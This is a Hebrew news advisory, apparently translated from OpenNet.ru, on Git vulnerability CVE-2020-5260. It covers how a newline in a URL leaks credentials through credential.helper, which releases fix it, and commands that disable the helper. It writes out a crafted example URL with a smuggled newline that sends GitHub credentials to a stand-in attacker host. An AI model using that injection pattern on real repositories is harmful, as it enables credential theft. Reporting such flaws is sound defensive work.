פגיעות של דליפת אישורים של Git

יצא לאור מהדורות מתקנות של מערכת בקרת המקור המבוזר Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 ו-2.17.4, ב אשר חיסל פגיעות (CVE-2020-5260) במטפל"credential.helper", מה שגורם לאישורים להישלח למארח הלא נכון כאשר לקוח git ניגש למאגר באמצעות כתובת URL בפורמט מיוחד המכילה תו חדש. ניתן להשתמש בפגיעות כדי לארגן שליחת אישורים ממארח ​​אחר לשרת הנשלט על ידי התוקף.

כאשר מציינים כתובת URL כמו "https://evil.com?%0ahost=github.com/", מטפל האישורים בעת חיבור למארח evil.com יעביר את פרמטרי האימות שצוינו עבור github.com. הבעיה מתרחשת בעת ביצוע פעולות כגון "גיt clone", כולל עיבוד כתובות URL עבור תת-מודולים (לדוגמה, "git submodule update" יעבד אוטומטית את כתובות ה-URL שצוינו בקובץ .gitmodules מהמאגר). הפגיעות מסוכנת ביותר במצבים שבהם מפתח משכפל מאגר מבלי לראות את כתובת האתר, למשל, כאשר עובדים עם תת-מודולים, או במערכות שמבצעות פעולות אוטומטיות, למשל, בסקריפטים של בניית חבילות.

כדי לחסום נקודות תורפה בגרסאות חדשות אסור העברת תו חדש בכל ערכים המועברים דרך פרוטוקול החלפת האישורים. עבור הפצות, אתה יכול לעקוב אחר שחרור עדכוני החבילות בדפים דביאן, אובונטו, רהל, SUSE/openSUSE, פדורה, קשת, FreeBSD.

כפתרון עוקף לחסימת הבעיה מומלץ אל תשתמש ב-credential.helper בעת גישה למאגרים ציבוריים ואל תשתמש ב-"git clone" במצב "--recurse-submodules" עם מאגרים לא מסומנים. כדי להשבית לחלוטין את המטפל credential.helper, אשר עושה זאת שימור ואחזור סיסמאות מ מטמון, מוגן קמרונות או קובץ עם סיסמאות, אתה יכול להשתמש בפקודות:

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

מקור: OpenNet.ru